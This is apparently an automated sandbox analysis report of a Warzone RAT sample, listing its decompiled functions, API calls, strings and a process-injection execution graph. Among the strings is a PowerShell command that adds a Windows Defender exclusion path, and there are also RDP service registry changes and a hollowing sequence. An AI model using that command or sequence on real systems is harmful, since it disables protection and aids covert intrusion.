                                                • Opcode ID: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
                                                • Instruction ID: 1849f6337e539491ffe2d687a0a9c8bdfff1226e08de7d808908600c112c9109
                                                • Opcode Fuzzy Hash: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
                                                • Instruction Fuzzy Hash: 5B015A71A00208AAD710DBA59C4AEEFB7BCEF84750F504176F905E32D0EA708E4587A5
                                                Function 004136E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00413710
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00413722
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FolderFreePathVirtuallstrcat
                                                • String ID: ;$\Microsoft Vision\
                                                • API String ID: 1529938272-253167065
                                                • Opcode ID: 25764ad4916311f979e6c93089d2d1c61dddf8e33a2d845b5791f30208703287
                                                • Instruction ID: 53e63a4236a49b8a302aa88940ac71d42f48ff56029f7dee3bcda8afb27f06c0
                                                • Opcode Fuzzy Hash: 25764ad4916311f979e6c93089d2d1c61dddf8e33a2d845b5791f30208703287
                                                • Instruction Fuzzy Hash: A70109B1C00119AACB10EFA1DD4AEDFBBBCAF55748F104166B505B2181EB38AB84CBD4
                                                Function 0040F4CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F4E6
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F4F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                • Opcode ID: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
                                                • Instruction ID: ff8e9ccf2255d32ac1a8c1a67c9cd3443cff3f67e47653b677edfd40f96dca84
                                                • Opcode Fuzzy Hash: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
                                                • Instruction Fuzzy Hash: 23E0D83078020C35CB346F756C0B7D77BA82B82749F4441B19542F16C2DB7CD94ACAE8
                                                Function 0040F51D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F535
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                • Opcode ID: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
                                                • Instruction ID: 2f1c81511d61838f55941c07d8fb31d28f6a249911401150564ccb1d4a38bf96
                                                • Opcode Fuzzy Hash: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
                                                • Instruction Fuzzy Hash: 7CE0123074021C66CB34AF71AC0AAD777A85B51745F0081B5A205E25C1DA78D989CE94
                                                Function 00410C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040FC6D,?,?,00402D84,?,00414648,?,?,00000000,?), ref: 00410C4B
                                                • GetProcAddress.KERNEL32(00000000,?,0040FC6D,?,?,00402D84,?,00414648,?,?,00000000,?), ref: 00410C52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: IsWow64Process$kernel32
                                                • API String ID: 1646373207-3789238822
                                                • Opcode ID: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
                                                • Instruction ID: aa38c12934784f8986f56b2f7d6e07c465e87370c79dbefe8b4e53ff979e27e3
                                                • Opcode Fuzzy Hash: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
                                                • Instruction Fuzzy Hash: 90E08C3A640304FBDB24DBE1CC0ABCBB6ACEB44751B214159B001A2240EBB8DB408B98
                                                Function 0040D17D Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D18E
                                                • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D1DD
                                                  • Part of subcall function 004033F5: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402A97,?,?,00000000,exit,00000000,start), ref: 0040341A
                                                  • Part of subcall function 004057FB: getaddrinfo.WS2_32(770113FB,00000000,00404EA0,00000000), ref: 00405848
                                                  • Part of subcall function 004057FB: socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
                                                  • Part of subcall function 004057FB: htons.WS2_32(00000000), ref: 00405885
                                                  • Part of subcall function 004057FB: freeaddrinfo.WS2_32(00000000), ref: 00405895
                                                  • Part of subcall function 004057FB: connect.WS2_32(?,?,00000010), ref: 004058A1
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D261
                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D27E
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D288
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                • String ID:
                                                • API String ID: 4195813003-0
                                                • Opcode ID: 969798bed8422ffa66327ee2b18fc53fe6cae6c57379716f7a23df82e7834667
                                                • Instruction ID: 7a94c8fae61b2e10d6092c111b0d62f0006c67d78966a4acde4d12fd3714661c
                                                • Opcode Fuzzy Hash: 969798bed8422ffa66327ee2b18fc53fe6cae6c57379716f7a23df82e7834667
                                                • Instruction Fuzzy Hash: 7331B571600606BBD704EBA1CC45FEAB7ACBF18314F10413AF519B21D1EF78AA048B98
                                                Function 0040F69F Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6AA
                                                • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6BE
                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6CA
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F70F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoadResource$FindFree
                                                • String ID:
                                                • API String ID: 3272429154-0
                                                • Opcode ID: 0fd3b68753ab6d783186f6d84016acbf3520c6cb5308a64147bb628e71b90a35
                                                • Instruction ID: a8c57747a45cef537438fef7edfaf31d6c185fb3add6f7deab0be250028dcda8
                                                • Opcode Fuzzy Hash: 0fd3b68753ab6d783186f6d84016acbf3520c6cb5308a64147bb628e71b90a35
                                                • Instruction Fuzzy Hash: 3D01C0B5300A01AFD3184F29EC88AA6B7B4FF89314704C239E525C77A0D774D85AC7A5
                                                Function 0040C9F2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                  • Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                  • Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040CA6C
                                                  • Part of subcall function 0040CA78: GetLastError.KERNEL32 ref: 0040CADE
                                                • LocalFree.KERNEL32(?), ref: 0040CA65
                                                  • Part of subcall function 0040CCB4: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
                                                  • Part of subcall function 0040CCB4: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
                                                  • Part of subcall function 0040CCB4: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                • String ID: $DPAPI
                                                • API String ID: 379455710-1819349886
                                                • Opcode ID: dabe7be40680fda6933c20434dd858ef31a71aa9e46db8101cfd5e2755da62df
                                                • Instruction ID: 04bf41e7008add8f4a3ae58a75aeb1b04db966ebd79b9b8d2087252f069c6e3c
                                                • Opcode Fuzzy Hash: dabe7be40680fda6933c20434dd858ef31a71aa9e46db8101cfd5e2755da62df
                                                • Instruction Fuzzy Hash: CE015E72A0010DFBDF10EBA1DD85EDEB778AB44705F118276E804F2184E734AB85DB98
                                                Function 004047EA Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastInputInfo.USER32 ref: 004047FF
                                                • GetTickCount.KERNEL32 ref: 00404805
                                                • GetForegroundWindow.USER32 ref: 00404819
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0040482C
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                                • String ID:
                                                • API String ID: 2567647128-0
                                                • Opcode ID: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
                                                • Instruction ID: 9232618d2a95307947b37617596d42c9c757323c2ecaddd148e12c6a0cc08536
                                                • Opcode Fuzzy Hash: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
                                                • Instruction Fuzzy Hash: F51130B1D00108ABCB04EFB5DD49ADDBBBDEF98305F008169A402B3190EF786B44CB54
                                                Function 0040EA89 Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32(?,00000000,00402A8C,00000000,exit,00000000,start), ref: 0040EA95
                                                • SetEvent.KERNEL32(00000000), ref: 0040EAA9
                                                • WaitForSingleObject.KERNEL32(0041956C,00001388), ref: 0040EAB6
                                                • TerminateThread.KERNEL32(0041956C,000000FE), ref: 0040EAC7
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                • String ID:
                                                • API String ID: 2174867186-0
                                                • Opcode ID: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
                                                • Instruction ID: 7c0d11aeeb9ee8d7e55f87269beabb2428f5cdeac9d462a674e1c882548833a8
                                                • Opcode Fuzzy Hash: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
                                                • Instruction Fuzzy Hash: 4E0186311046009BE734AF13E949F96B7B2BF54311F104E3EE453628E0CBB968A9CF55
                                                Function 00407AF1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,?,00402617,?,?), ref: 00407B2C
                                                  • Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
                                                  • Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
                                                  • Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentHeapOpenWow64
                                                • String ID: XXXXXX$YYj
                                                • API String ID: 1563638298-1957121946
                                                • Opcode ID: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
                                                • Instruction ID: e5732774cbe7b056c6d1e26ea42a9f4b70b4e0c322beca2f04b95ba6d31a2942
                                                • Opcode Fuzzy Hash: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
                                                • Instruction Fuzzy Hash: 7331EBB1E081057FFF149A658D41BBF76ACDB90398F20413FF914E62C1FA78AD4146AA
                                                Function 0040FCB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040FCFC
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                • API String ID: 1903904756-1211650757
                                                • Opcode ID: c3d1e02d14da2eddb0a7905d087265acb581fe7e752c854f8c579e11f7e302fe
                                                • Instruction ID: ee41a6e26054bff040f486a2fe8a50efbaf53c62fe2c998e29d90c35aae1452c
                                                • Opcode Fuzzy Hash: c3d1e02d14da2eddb0a7905d087265acb581fe7e752c854f8c579e11f7e302fe
                                                • Instruction Fuzzy Hash: 7B115C70A00118ABCB24EFA5C9568EEBB78AF54708B10047FB006B31D1EBB85F45CB98
                                                Function 0040DE1F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DE51
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                • ServiceDll, xrefs: 0040DE5F
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DE2C
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                • API String ID: 1903904756-387424650
                                                • Opcode ID: 69cdb7d03b35e7e46b7d5f0623e590d8d54d06f11d906f947abb4056c63acd46
                                                • Instruction ID: 7ad04a792a366f4aa54ef19a0ec8d4b44cd364d9f3d079a0fce37a55fba9d951
                                                • Opcode Fuzzy Hash: 69cdb7d03b35e7e46b7d5f0623e590d8d54d06f11d906f947abb4056c63acd46
                                                • Instruction Fuzzy Hash: 37114C31D00108AACB24EBE6C956CEEBB79AF90704B10006FA801B72C1EB785F45CA94
                                                Function 0040D9B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040D9EA
                                                  • Part of subcall function 00411039: RegSetValueExW.KERNEL32 ref: 00411058
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                • ServiceDll, xrefs: 0040DA03
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D9C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                                • API String ID: 2854241163-387424650
                                                • Opcode ID: 33979379b4683227e0ec619b837cce125f3521f24e55d7ce72e3e6525def99b9
                                                • Instruction ID: 1a5d0307058eeef04090d9c41a954dd4ac33c1ebcd4837d1df6c387a7730c537
                                                • Opcode Fuzzy Hash: 33979379b4683227e0ec619b837cce125f3521f24e55d7ce72e3e6525def99b9
                                                • Instruction Fuzzy Hash: F2111F71D00118ABCB14EFA2CC96DEFBB79EF94704F40446FE502722D1EB786A85CA64
                                                Function 00412FD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,770113FB,00000000,00413628), ref: 00413008
                                                • WinExec.KERNEL32 ref: 0041304E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateExecFileModuleNameProcess
                                                • String ID: powershell Add-MpPreference -ExclusionPath
                                                • API String ID: 1183730998-2194938034
                                                • Opcode ID: 19fe353fada35a37364561a76d4533d17ec42238865cab846ce3ff7a7c306435
                                                • Instruction ID: c096fa8388d5753e4bd1dcd6f4560e03b64b7c831576f0fd8345149e6e8dd7f2
                                                • Opcode Fuzzy Hash: 19fe353fada35a37364561a76d4533d17ec42238865cab846ce3ff7a7c306435
                                                • Instruction Fuzzy Hash: 9EF062B154025076F22032725CCBFBF5A9CDF99759F04043BF684B55D2EA7C998041BD
                                                Function 004055A5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • send.WS2_32(00413CC7,IO@,?,00000000), ref: 00405608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID: IO@$warzone160
                                                • API String ID: 2809346765-39530799
                                                • Opcode ID: 30616ba3d47c78787e6e2656cedf432b5eab89a9dbfb088b6cda85aa1d450a88
                                                • Instruction ID: c1e0b2cfaea86d07842ac6dd019f160f43f9bd064c1ea9b5a9466f7d64858a70
                                                • Opcode Fuzzy Hash: 30616ba3d47c78787e6e2656cedf432b5eab89a9dbfb088b6cda85aa1d450a88
                                                • Instruction Fuzzy Hash: 65018471901008BBDB04EBA5DC42CDEBB6DDF50365B50423EF122721D1EB79AB158AA9

                                                Execution Graph

                                                Execution Coverage:34.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:103
                                                Total number of Limit Nodes:0
                                                execution_graph 2609 445794 2611 4457a0 CreateProcessW 2609->2611 2612 445c04 2611->2612 2483 443dc0 2484 443ddc 2483->2484 2489 444a69 2484->2489 2485 443e90 2522 446851 2485->2522 2490 444c7c 2489->2490 2561 445d80 2490->2561 2492 444e77 2565 446388 2492->2565 2494 444f89 2569 446488 2494->2569 2573 446481 2494->2573 2495 444fc7 2511 445d80 NtReadVirtualMemory 2495->2511 2496 4450f0 2577 4465a0 2496->2577 2581 4465a8 2496->2581 2497 44512c 2517 445d80 NtReadVirtualMemory 2497->2517 2498 4454b4 2509 4465a0 NtWriteVirtualMemory 2498->2509 2510 4465a8 NtWriteVirtualMemory 2498->2510 2499 4455bd 2518 445d80 NtReadVirtualMemory 2499->2518 2500 44560b 2585 4466f9 2500->2585 2589 446700 2500->2589 2501 4456b3 2508 446388 NtResumeThread 2501->2508 2502 445730 2502->2485 2503 44518b 2503->2498 2514 4465a0 NtWriteVirtualMemory 2503->2514 2515 4465a8 NtWriteVirtualMemory 2503->2515 2508->2502 2509->2499 2510->2499 2511->2496 2514->2503 2515->2503 2517->2503 2518->2500 2519 445d80 NtReadVirtualMemory 2519->2492 2521 445d80 NtReadVirtualMemory 2521->2494 2523 446894 2522->2523 2597 4473a8 2523->2597 2601 4473b8 2523->2601 2524 446a4b 2556 4473a8 NtReadVirtualMemory 2524->2556 2557 4473b8 NtReadVirtualMemory 2524->2557 2525 446a8f 2558 446388 NtResumeThread 2525->2558 2526 446b15 2559 4473a8 NtReadVirtualMemory 2526->2559 2560 4473b8 NtReadVirtualMemory 2526->2560 2527 446ba1 2537 446481 VirtualAllocEx 2527->2537 2538 446488 VirtualAllocEx 2527->2538 2528 446bdf 2544 4473a8 NtReadVirtualMemory 2528->2544 2545 4473b8 NtReadVirtualMemory 2528->2545 2529 446d08 2546 4465a0 NtWriteVirtualMemory 2529->2546 2547 4465a8 NtWriteVirtualMemory 2529->2547 2530 446d44 2554 4473a8 NtReadVirtualMemory 2530->2554 2555 4473b8 NtReadVirtualMemory 2530->2555 2531 4470cc 2542 4465a0 NtWriteVirtualMemory 2531->2542 2543 4465a8 NtWriteVirtualMemory 2531->2543 2532 4471d5 2552 4473a8 NtReadVirtualMemory 2532->2552 2553 4473b8 NtReadVirtualMemory 2532->2553 2533 447223 2539 446700 NtSetContextThread 2533->2539 2540 4466f9 NtSetContextThread 2533->2540 2534 4472cb 2541 446388 NtResumeThread 2534->2541 2535 443ef2 2536 446da3 2536->2531 2548 4465a0 NtWriteVirtualMemory 2536->2548 2549 4465a8 NtWriteVirtualMemory 2536->2549 2537->2528 2538->2528 2539->2534 2540->2534 2541->2535 2542->2532 2543->2532 2544->2529 2545->2529 2546->2530 2547->2530 2548->2536 2549->2536 2552->2533 2553->2533 2554->2536 2555->2536 2556->2525 2557->2525 2558->2526 2559->2527 2560->2527 2562 445da4 2561->2562 2593 446258 2562->2593 2566 4463cc NtResumeThread 2565->2566 2568 444efd 2566->2568 2568->2521 2570 4464cc VirtualAllocEx 2569->2570 2572 446544 2570->2572 2572->2495 2574 4464cc VirtualAllocEx 2573->2574 2576 446544 2574->2576 2576->2495 2578 4465a8 NtWriteVirtualMemory 2577->2578 2580 44668a 2578->2580 2580->2497 2582 4465f1 NtWriteVirtualMemory 2581->2582 2584 44668a 2582->2584 2584->2497 2586 446749 NtSetContextThread 2585->2586 2588 4467c1 2586->2588 2588->2501 2590 446749 NtSetContextThread 2589->2590 2592 4467c1 2590->2592 2592->2501 2594 4462a4 NtReadVirtualMemory 2593->2594 2596 444e33 2594->2596 2596->2519 2598 4473b8 2597->2598 2600 446258 NtReadVirtualMemory 2598->2600 2599 447491 2599->2524 2600->2599 2602 4473dc 2601->2602 2604 446258 NtReadVirtualMemory 2602->2604 2603 447491 2603->2524 2604->2603 2605 4457a0 2606 445830 CreateProcessW 2605->2606 2608 445c04 2606->2608

                                                Executed Functions

                                                Function 004457A0 Relevance: 1.9, APIs: 1, Instructions: 397processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
